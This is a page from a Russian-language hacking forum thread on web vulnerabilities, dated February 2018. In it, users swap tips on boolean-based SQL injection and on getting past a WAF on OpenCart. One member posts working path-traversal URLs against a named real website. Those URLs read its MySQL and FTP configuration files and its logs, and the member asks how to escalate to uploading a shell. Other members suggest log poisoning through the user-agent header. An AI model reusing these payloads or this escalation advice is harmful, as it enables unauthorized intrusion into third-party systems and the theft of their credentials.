HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 225 из 296 « Первая < 125175215 221 222 223 224 225 226 227 228 229 235275 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2241  
Старый 12.02.2018, 14:54
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от man474019  
man474019 said:

and, what can do in this situation ?
Try boolean-based via more than 1 row )
 
Ответить с цитированием

  #2242  
Старый 12.02.2018, 15:00
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
 
Ответить с цитированием

  #2243  
Старый 12.02.2018, 15:27
MotherHacker
Guest
Сообщений: n/a
Провел на форуме:
2312

Репутация: 0
По умолчанию
Цитата:
Сообщение от man474019  
man474019 said:

sorry, but there waf blocks _ symbol, don't know how to bypass
++
default opencart tables have _ symbol (
look here

https://rdot.org/forum/showthread.php?t=2869

https://rdot.org/forum/showpost.php?...2&postcount=10
 
Ответить с цитированием

  #2244  
Старый 14.02.2018, 14:51
z3u5
Guest
Сообщений: n/a
Провел на форуме:
4001

Репутация: 0
По умолчанию
Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.

Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:

Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:

- конфиг мускула

Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп

Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)

Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:

- логи апача

- способ залиться
 
Ответить с цитированием

  #2245  
Старый 14.02.2018, 14:55
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию
Цитата:
Сообщение от z3u5  
z3u5 said:

Итак, есть сайт enature.net, он не очень хороший и вообще сами можете тематику посмотреть. Весьма легальный, работает с 95-го года.
Нашел LFI через сканер (netsparker), до этого дел с PHP-include не имел, выглядит примерно так:
Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?param=/../../../../../../../../../../proc/version
Что нашел:
- конфиг мускула
Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/mysql/my.cnf
- конфиг фтп
Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../etc/protpd/proftpd.conf
- логи фтп (не нашел подключения)
Код:
Code:
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/xferlog
https://www.enature.net/nudist_gallery/full_image/?page=/../../../../../../../../../../var/log/cdninvalidate.log
Что не могу найти:
- логи апача
- способ залиться
чёт не фурычит сайт )
 
Ответить с цитированием

  #2246  
Старый 14.02.2018, 14:58
z3u5
Guest
Сообщений: n/a
Провел на форуме:
4001

Репутация: 0
По умолчанию
Цитата:
Сообщение от Sensoft  
Sensoft said:

чёт не фурычит сайт )
С СНГ IP может не пускать.

Забыл поздороваться и попросить помощи, ну вы поняли. Ковырял часа 4 к ряду, уже хз, может просто не разрешает читать логи (но при этом разрешает конфиги?)
 
Ответить с цитированием

  #2247  
Старый 14.02.2018, 15:23
crlf
Guest
Сообщений: n/a
Провел на форуме:
169212

Репутация: 441
По умолчанию
Цитата:
Сообщение от z3u5  
z3u5 said:

Нашел LFI через сканер (netsparker)
Ниразу не LFI, это читалка. На чтение логов нет прав.
 
Ответить с цитированием

  #2248  
Старый 14.02.2018, 15:30
z3u5
Guest
Сообщений: n/a
Провел на форуме:
4001

Репутация: 0
По умолчанию
Цитата:
Сообщение от crlf  
crlf said:

Ниразу не LFI, это читалка. На чтение логов нет прав.
Опять эти корпоративные свиньи пугают уязвимостями чтобы я купил лицуху сканера.

Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
 
Ответить с цитированием

  #2249  
Старый 14.02.2018, 15:33
erwerr2321
Guest
Сообщений: n/a
Провел на форуме:
759330

Репутация: 147
По умолчанию
Цитата:
Сообщение от z3u5  
z3u5 said:

Спасибо, как читалку отличить от инклуда? Пускать в логи должно?
код должен выполняться?
 
Ответить с цитированием

  #2250  
Старый 14.02.2018, 15:38
z3u5
Guest
Сообщений: n/a
Провел на форуме:
4001

Репутация: 0
По умолчанию
Цитата:
Сообщение от ms13  
ms13 said:

код должен выполняться?
Ну хорошо, но чтобы он выполнился нужно всунуть в логи, правильно? То-есть там через юзерагент, логины и прочие пляски. Или есть еще варианты?

Я не в теме, пишу без наездов, вам все кажется.
 
Ответить с цитированием
Ответ
Страница 225 из 296 « Первая < 125175215 221 222 223 224 225 226 227 228 229 235275 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ